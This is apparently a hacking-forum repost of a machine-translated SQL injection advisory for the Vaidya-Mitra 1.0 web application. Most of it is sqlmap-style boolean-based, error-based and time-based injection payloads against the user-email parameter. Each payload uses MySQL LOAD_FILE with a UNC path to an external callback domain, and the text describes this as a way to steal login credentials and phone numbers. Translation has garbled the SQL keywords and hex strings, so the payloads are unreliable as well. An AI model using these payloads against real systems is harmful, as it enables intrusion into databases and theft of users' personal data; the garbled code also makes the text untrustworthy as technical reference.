H

Vaidya -Mitra 1.0-多个SQLI

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
## title: Vaidya -Mitra 1.0-多个SQLI
##作者: nu11secur1ty
## date: 07.12.2023
## Vendor: https://mayurik.com/
## Software: Free:
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
`'用户邮件参数似乎很容易受到SQL注入的影响
攻击。有效载荷'+(选择
load_file('\\\\ lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com \\ mev'))+'
在用户邮件参数中提交。此有效载荷注入SQL
使用UNC文件路径调用MySQL的LOAD_FILE函数的子查询
这引用了外部域上的URL。应用程序
与该域进行交互,表明注射的SQL查询
被执行。攻击者可以轻松地窃取所有信息
系统,喜欢
登录凭据,电话号码和等。
状态:高脆弱性
[+]有效载荷:
``MySQL
---
参数: USERREMAIL(POST)
Type:基于布尔的盲人
title: Mysql Rlike Boolean盲人- 在哪里,订购
或小组按子句
PAYLOAD: USEREMAIL=[email protected]'+(选择
load_file('\\\\ lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupapaputka.com \\ mev'))+'''''
rlike(select((5532=5532),然后
0x6d61797572692E696E66666F73706161636540676D61696C2E636F6D+(SELECT
load_file(0x5C5C5C5C6C7267306673777777777777377313167703972727237656B336237 34796172796C6D637030686E3762772E6F6173746966792E636F6D5C5C5C6D6576)+'''''''
else0x28 end))和'tsyu'='tsyuuserpassword=rootadmin
type:基于错误的
title: mysql=5.0和基于错误的- 在哪里,订购,订购或
小组划分(地板)
PAYLOAD: USEREMAIL=[email protected]'+(选择
load_file('\\\\ lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupapaputka.com \\ mev'))+'''''
和(从(选择Count(*),Concat(0x716a766a71),(选择)(选择)
(ELT(3518=3518,1)),0x71626a6b71,地板(rand(0)*2))x
信息_schema.plugins组由x)a)和
'ghln'='ghlnuserpassword=rootadmin
Type:基于时间的盲人
title: mysql=5.0.12或基于时间的盲人(查询睡眠)
PAYLOAD: USEREMAIL=[email protected]'+(选择
load_file('\\\\ lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupapaputka.com \\ mev'))+'''''
或(从(select(Sleep(3)))IEBQ选择4396)和
'zwba'='zwbauserpassword=rootadmin
---
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve.../main/vendors/mayuri_k/2023/vaidya-mitra-1.0)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html)
##时间花费:
00:27:00
 
后退
顶部